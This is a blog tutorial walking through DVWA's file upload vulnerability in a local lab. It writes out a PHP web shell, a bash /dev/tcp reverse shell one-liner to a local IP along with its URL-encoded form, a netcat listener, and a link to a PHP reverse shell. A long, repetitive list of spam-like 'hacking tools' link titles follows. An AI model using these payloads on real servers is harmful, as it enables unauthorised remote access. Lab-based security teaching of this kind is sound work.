sábado, 27 de janeiro de 2024

Learning Web Pentesting With DVWA Part 5: Using File Upload To Get Shell

In today's article we will go through the File Upload vulnerability of DVWA. File Upload vulnerability is a common vulnerability in which a web app doesn't restrict the type of files that can be uploaded to a server. The result of which is that a potential adversary uploads a malicious file to the server and finds his/her way to gain access to the server or perform other malicious activities. The consequences of Unrestricted File Upload are put out by OWASP as: "The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored."
For successful vulnerability exploitation, we need two things:
1. An unrestricted file upload functionality.
2. Access to the uploaded file to execute the malicious code.
To perform this type of attack on DVWA click on File Upload navigation link, you'll be presented with a file upload form like this:
Lets upload a simple text file to see what happens. I'll create a simple text file with the following command:
echo TESTUPLOAD > test.txt 
and now upload it.
The server gives a response back that our file was uploaded successfully and it also gives us the path where our file was stored on the server. Now lets try to access our uploaded file on the server, we go to the address provided by the server which is something like this:
http://localhost:9000/hackable/uploads/test.txt 
and we see the text we had written to the file. Lets upload a php file now since the server is using php. We will upload a simple php file containing phpinfo() function. The contents of the file should look something like this.
<?php phpinfo(); ?> 
Save the above code in a file called info.php (you can use any name) and upload it. Now naviagte to the provided URL:
http://localhost:9000/hackable/uploads/info.php 
and you should see a phpinfo page like this:
phpinfo page contains a lot of information about the web application, but what we are interested in right now in the page is the disable_functions column which gives us info about the disabled functions. We cannot use disabled functions in our php code. The function that we are interested in using is the system() function of php and luckily it is not present in the disable_functions column. So lets go ahead and write a simple php web shell:
<?php system($_GET["cmd"]); ?> 
save the above code in a file shell.php and upload it. Visit the uploaded file and you see nothing. Our simple php shell is looking for a "cmd" GET parameter which it passes then to the system() function which executes it. Lets check the user using the whoami command as follows:
http://localhost:9000/hackable/uploads/shell.php?cmd=whoami 
we see a response from the server giving us the user under which the web application is running.
We can use other bash commands such as ls to list the directories. Lets try to get a reverse shell now, we can use our existing webshell to get a reverse shell or we can upload a php reverse shell. Since we already have webshell at our disposal lets try this method first.
Lets get a one liner bash reverseshell from Pentest Monkey Reverse Shell Cheat Sheet and modify it to suit our setup, but we first need to know our ip address. Enter following command in a terminal to get your ip address:
ifconfig docker0 
the above command provides us information about our virtual docker0 network interface. After getting the ip information we will modify the bash one liner as:
bash -c 'bash -i >& /dev/tcp/172.17.0.1/9999 0>&1' 
here 172.17.0.1 is my docker0 interface ip and 9999 is the port on which I'll be listening for a reverse shell. Before entering it in our URL we need to urlencode it since it has some special characters in it. After urlencoding our reverse shell one liner online, it should look like this:
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27 
Now start a listener on host with this command:
nc -lvnp 9999 
and then enter the url encoded reverse shell in the cmd parameter of the url like this:
http://localhost:9000/hackable/uploads/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27 
looking back at the listener we have a reverse shell.
Now lets get a reverse shell by uploading a php reverse shell. We will use pentest monkey php reverse shell which you can get here. Edit the ip and port values of the php reverse shell to 172.17.0.1 and 9999. Setup our netcat listener like this:
nc -lvnp 9999 
and upload the reverse shell to the server and access it to execute our reverse shell.
That's it for today have fun.

References:

  1. Unrestricted File Upload: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
  2. Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  3. Php Reverse Shell (Pentest Monkey): https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Continue reading


  1. Hacking Tools Windows 10
  2. Hacker Tools Free
  3. Hacker Hardware Tools
  4. Wifi Hacker Tools For Windows
  5. Hacking Tools For Beginners
  6. Hacker Tools
  7. Nsa Hacker Tools
  8. Pentest Tools Framework
  9. Hack Tools For Ubuntu
  10. Pentest Box Tools Download
  11. Game Hacking
  12. Hack Apps
  13. Pentest Tools Framework
  14. What Is Hacking Tools
  15. Hack Tool Apk No Root
  16. Ethical Hacker Tools
  17. Best Hacking Tools 2019
  18. Hack And Tools
  19. Hacking Tools Hardware
  20. Pentest Tools For Windows
  21. Pentest Tools Bluekeep
  22. Termux Hacking Tools 2019
  23. Wifi Hacker Tools For Windows
  24. Hack Tools For Games
  25. How To Hack
  26. Hacker Tools Apk Download
  27. How To Make Hacking Tools
  28. New Hack Tools
  29. Game Hacking
  30. Pentest Tools Github
  31. Hack Tools
  32. Nsa Hack Tools Download
  33. Nsa Hack Tools Download
  34. Hacker Tools Online
  35. Hacking Tools Software
  36. Hacking Tools Mac
  37. Hack Tool Apk No Root
  38. New Hack Tools
  39. Hacking Apps
  40. Hacker Tools Hardware
  41. Nsa Hack Tools Download
  42. Android Hack Tools Github
  43. Hacking Tools Kit
  44. Hacking Tools Github
  45. Hacker
  46. World No 1 Hacker Software
  47. Hacker Techniques Tools And Incident Handling
  48. Pentest Tools Bluekeep
  49. Pentest Tools List
  50. Nsa Hacker Tools
  51. Kik Hack Tools
  52. Pentest Tools Open Source
  53. New Hack Tools
  54. Hacking Tools Github
  55. Best Pentesting Tools 2018
  56. Pentest Tools List
  57. Hack Tools Pc
  58. Hacker
  59. Blackhat Hacker Tools
  60. Hack Tools Github
  61. Hacker Tools 2019
  62. Best Pentesting Tools 2018
  63. Best Hacking Tools 2020
  64. Pentest Box Tools Download
  65. Hacking Tools Pc
  66. Hacker
  67. Pentest Tools Url Fuzzer
  68. Hacker Tool Kit
  69. Pentest Tools For Android
  70. Hacker Tools 2020
  71. Computer Hacker
  72. Hacking Tools For Mac
  73. Termux Hacking Tools 2019
  74. Underground Hacker Sites
  75. Hacking Tools Mac
  76. Hack Tools
  77. Nsa Hacker Tools
  78. Hacking Tools For Mac
  79. Ethical Hacker Tools
  80. Hacking Tools For Kali Linux
  81. Hack Tools For Ubuntu
  82. Hacking Tools Download
  83. Android Hack Tools Github
  84. Best Hacking Tools 2020
  85. Hacking Tools
  86. Hack Tools For Mac
  87. Black Hat Hacker Tools
  88. Install Pentest Tools Ubuntu
  89. Blackhat Hacker Tools
  90. Hacks And Tools

Nenhum comentário:

Postar um comentário